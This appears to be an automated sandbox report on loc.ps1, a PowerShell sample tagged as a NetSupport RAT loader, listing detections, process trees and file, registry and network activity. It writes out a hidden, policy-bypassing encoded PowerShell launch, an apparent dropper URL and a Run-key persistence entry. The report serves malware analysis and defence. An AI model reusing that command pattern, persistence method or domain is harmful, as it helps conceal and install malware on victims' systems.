
Windows Analysis Report
loc.ps1

Overview

General Information

Sample Name: loc.ps1
Analysis ID: 876995
MD5: d7bd6a17466dbe1e448956b0018ad94d
SHA1: a9d50d22cc9024dc6bd3297286783ef4b38d6f99
SHA256: 5f5f8f102490525c22deed33b94fa01b52289e7166eedccd04cfece900958669
Tags: netsupportps1rat

Detection

Score: 64
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Very long command line found
Potential dropper URLs found in powershell memory
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Creates a process in suspended mode (likely to inject code)
Contains long sleeps (>= 3 min)
Enables debug privileges

Classification

  • System is w10x64
  • powershell.exe (PID: 6560 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\loc.ps1 MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 6424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6868 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ep bypass -win hid -enc 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 MD5: 95000560239032BC68B4C2FDFCDEF913)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched


AV Detection

Source: loc.ps1 Virustotal: Detection: 22%
Source: Binary string: ystem.Core.pdbpdb source: powershell.exe, 00000002.00000002.440315694.00000229ABC15000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdbpdblib.pdb source: powershell.exe, 00000002.00000002.440315694.00000229ABC42000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData

Networking

Source: powershell.exe, 00000002.00000002.441829103.00000229AC3BA000.00000004.00000800.00020000.00000000.sdmp String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Version, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:DefaultNoun, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:InstanceCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:StaticCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:CmdletAdapterPrivateData
Source: powershell.exe, 00000002.00000002.441829103.00000229AC3BA000.00000004.00000800.00020000.00000000.sdmp String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQueryX
Source: powershell.exe, 00000002.00000002.441829103.00000229AC3BA000.00000004.00000800.00020000.00000000.sdmp String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyCollection, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyString, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNullOrEmpty, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateCount, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateLength, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateRange, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateSet, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ObsoletessAt
Source: unknown DNS traffic detected: query: usherskenya.co.ke replaycode: Server failure (2)
Source: powershell.exe, 00000000.00000002.479156997.00000281D1C70000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000003.470180866.00000281D1C47000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.440315694.00000229ABC42000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000002.00000002.455798841.00000229BC21E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.441829103.00000229AC3BA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.441829103.00000229AC3BA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.473249087.00000281B9C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.441829103.00000229AC1B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.441829103.00000229AC3BA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000002.00000002.441829103.00000229AC3BA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.455798841.00000229BC21E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.455798841.00000229BC21E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.455798841.00000229BC21E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.441829103.00000229AC3BA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000003.435183245.00000229AD753000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.455798841.00000229BC21E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.441829103.00000229AC3BA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://usherskenya.co.ke/forms/view.php8F

System Summary

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 4854
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF9A5707CA2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF9A570D3C5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF9A570DE43
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF9A5700D30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF9A57080AF
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF9A5700CD0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\loc.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ep bypass -win hid -enc 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
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6424:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\ONEN0TEupdate_1220
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_em3oh2mh.n0i.ps1
Source: classification engine Classification label: mal64.troj.evad.winPS1@4/8@0/0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF9A57080A2 push esi; retf 2_2_00007FF9A57080A3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF9A570A024 push edi; ret 2_2_00007FF9A570A039
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF9A5709F24 push edi; ret 2_2_00007FF9A5709F39
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF9A5711C57 push esp; retf 2_2_00007FF9A5711C58
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF9A57DB9DE push 8B485F9Bh; iretd 2_2_00007FF9A57DB9E6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ONEN0TEupdate_1220Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ONEN0TEupdate_1220Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2784
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9244
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6764 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6904 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6972 Thread sleep count: 9244 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7088 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: powershell.exe, 00000002.00000002.441829103.00000229AD56D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tEventVmNetworkAdapter',
Source: powershell.exe, 00000002.00000002.441829103.00000229AD56D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'Remove-NetEventVmNetworkAdapter',
